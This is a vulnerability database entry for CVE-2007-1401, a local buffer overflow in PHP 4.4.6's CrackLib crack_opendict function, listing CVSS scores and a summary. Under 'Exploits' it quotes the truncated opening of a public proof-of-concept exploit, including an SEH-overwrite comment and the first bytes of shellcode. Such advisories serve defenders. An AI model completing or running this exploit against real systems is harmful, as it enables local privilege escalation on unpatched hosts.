6.9
CVSSv2

CVE-2007-1401

Published: 10/03/2007 Updated: 16/10/2018
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in the crack extension (CrackLib), as bundled with PHP 4.4.6 and other versions prior to 5.0.0, might allow local users to gain privileges via a long argument to the crack_opendict function.

Vulnerable Product Search on Vulmon Subscribe to Product

php php 4.4.6

Exploits

<?php //PHP 446 crack_opendict() local buffer overflow poc exploit //win2k sp3 version / seh overwrite method //to be launched from the cli // by rgod // site: retrogodaltervistaorg if (!extension_loaded("crack")){ die("you need the crack extension loaded"); } $____scode= "\xeb\x1b" "\x5b" "\x31\xc0" "\x50" "\x31\xc0" "\x88\x ...